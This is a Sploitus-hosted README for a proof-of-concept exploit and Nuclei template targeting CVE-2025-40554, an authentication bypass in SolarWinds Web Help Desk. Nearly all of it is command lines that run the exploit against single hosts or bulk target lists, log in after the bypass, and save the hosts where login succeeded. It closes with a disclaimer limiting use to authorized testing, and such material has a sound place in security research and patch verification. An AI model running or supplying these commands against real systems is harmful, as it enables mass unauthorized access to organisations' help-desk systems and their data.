Share
## https://sploitus.com/exploit?id=A7ACD41C-8E71-5449-A264-B9C80754DC4E
# CVE-2025-40554 โ€“ SolarWinds Web Help Desk Auth Bypass PoC

Proof-of-concept and Nuclei template for **CVE-2025-40554** (SolarWinds Web Help Desk authentication bypass

Nuclei:**

```bash
nuclei -u https://TARGET:8443 -t CVE-2025-40554.yaml
nuclei -l list_target.txt -t CVE-2025-40554.yaml
```

```bash
pip install -r requirements.txt
```

**Single target (bypass + login):**

```bash
python3 exploit_auth_bypass.py -t https://TARGET:8443
```



**Single target, bypass only (no login):**

```bash
python3 exploit_auth_bypass.py -t https://TARGET:8443 --no-login
```

**Target list (saves vulnerable+login only to `vulnerable_login.txt`):**

```bash
python3 exploit_auth_bypass.py -l result_all.txt
python3 exploit_auth_bypass.py -l targets.txt -o my_login_ok.txt
```

## Disclaimer

This PoC is for **authorized security research and testing only**. Unauthorized access to computer systems is illegal. The authors are not responsible for misuse.